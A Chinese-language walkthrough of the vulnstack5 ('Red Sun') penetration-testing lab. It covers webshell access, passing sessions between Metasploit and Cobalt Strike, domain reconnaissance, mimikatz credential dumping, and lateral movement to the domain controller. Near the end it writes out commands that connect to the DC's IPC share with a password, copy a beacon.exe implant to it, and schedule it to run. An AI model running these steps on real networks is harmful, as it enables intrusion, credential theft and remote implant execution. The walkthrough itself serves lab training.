红日靶场5-vulnstack5
环境配置
1 | win7 |
自动获取ip
起一下phpstudy
外网
扫下端口
直接传个马上去,具体就不演示了,主要是内网渗透
内网
内网信息收集
直接冰蝎连msf
MSF会话传递到CS
MSF–>CS
首先msf拿到shell后
1 | use exploit/windows/local/payload_inject |
发现失败0.0,说php的不允许,百度无果,但还是记录下过程
CS–>MSF
记录记录
首先在CS上线一个shell:
点击listeners,新建一个监听器:
点击Attacks,选择Scripted Web Delivery,生成payload:
在目标主机上执行这条命令,CS成功上线:
在MSF上,创建监听:
这里使用的payload要和CS上使用的一致。
在CS上建立Foreign HTTP(S)监听:
端口一致。
然后右键选择一个CS上的会话,选择spawn:
选择刚才监听,msf成功上线:
信息收集
这边还是用CS,一般win习惯了用CS,linux习惯用msf
直接弹个shell
可以看到是有域的
还有个138段
systeminfo
arp -a
可以看到138这个地址
注入个SUN\leo,然后查看域信息
ping下确认域管地址
net group "domain admins" /domain
查询域用户
查询域内DNS记录
mimikatz抓密码
fscan
扫一下138这个段
还扫到了漏洞
内网横向移动
DC不出网,所以需要个中转
这边直接psexec传个DC
发现失败,没关防火墙,关下防火墙
成功
这里横向也可以利用IPC(当密码过期时,psexec会失败)
建立IPC连接
net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator
检查
net use
上传文件(这里的exe要是完整的,监听为Win7的)
copy C:\\beacon.exe \\192.168.138.138\c$
查看时间,设置计划任务(间隔时间不要太短)
net time \\192.168.138.138
at \\192.168.138.138 yy:xx:mm c:\beacon.exe